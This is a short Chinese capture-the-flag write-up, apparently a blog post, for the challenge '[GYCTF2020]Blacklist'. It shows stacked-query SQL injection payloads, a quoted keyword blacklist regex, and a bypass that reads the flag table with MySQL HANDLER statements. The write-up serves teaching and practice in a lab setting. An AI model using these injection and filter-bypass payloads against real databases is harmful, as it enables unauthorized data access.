[GYCTF2020]Blacklist

打开题目,看到是

应该又是sql注入,开始进行判断闭合符号,输入'发现出现。

那么闭合符号大概率就是 ' 了

解这尝试了正常解法,发现都不能解出。之后尝试使用堆叠。

输入

1';show databases;

出现

那么使用来查询都有哪些表

1';show tables;

发现有FlagHere,flag大概率在这里,之后使用

1';show columns from FlagHere; 

出现

 

flag果然在这里,之后再使用

1';select * fron FlagHere;

来找flag字段值,但是出现了

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

看来把很多东西都过滤了。

之后使用AI来搜寻可以实现与select相同作用的命令,找到了一个名为HANDLER的命令

之后将这几条语句进行堆叠,成功得到flag。

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;

以下我总结了一篇关于HANDLER命令使用的文章,有兴趣的可以看一下

MySQL HANDLER命令:一种独特的表数据访问方式-CSDN博客

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值